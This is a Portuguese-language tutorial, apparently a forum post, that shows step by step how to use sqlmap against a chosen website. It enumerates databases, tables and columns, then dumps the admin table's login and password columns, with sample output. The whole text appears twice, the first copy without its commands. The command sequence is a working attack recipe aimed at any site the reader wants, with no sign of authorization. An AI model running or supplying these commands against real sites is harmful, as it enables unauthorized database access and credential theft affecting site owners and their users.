O que é?
Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.
Para ver os comandos, basta digitar
Estudo
Após você ter o site que deseja explorar, digite
--dbs é para descobrir a(s) database(s) que contem no site
O resultado será mais ou menos assim
Após descobrir a(s) data base(s), digite
--tables é para descobrir as tabelas que tem dentro da database
O resultado será mais ou menos assim
Após descobrir as tabelas, digite
--columns é para descobrir as colunas que tem dentro da tabela escolhida
O resultado será mais ou menos assim
Após descobrir as colunas, digite
--dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna
De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da pasta /pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv
Agradecimentos:
- n4sss
- Cjota
- Marcos nesster
- Certinho
Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.
Para ver os comandos, basta digitar
Código:
python sqlmap.py -h
Após você ter o site que deseja explorar, digite
Código:
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs
O resultado será mais ou menos assim
Código:
[ * ] database_do_site [ * ] information_schema
Após descobrir a(s) data base(s), digite
Código:
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables
O resultado será mais ou menos assim
Código:
+---------------+ | admin | | publicidade | | teste | +---------------+
Após descobrir as tabelas, digite
Código:
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns
O resultado será mais ou menos assim
Código:
+--------+--------------+ | Column | Type | +--------+--------------+ | ID | int(11) | | login | varchar(255) | | senha | varchar(255) | +--------+--------------+
Após descobrir as colunas, digite
Código:
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,senha' --dump
De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da pasta /pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv
Agradecimentos:
- n4sss
- Cjota
- Marcos nesster
- Certinho
Comment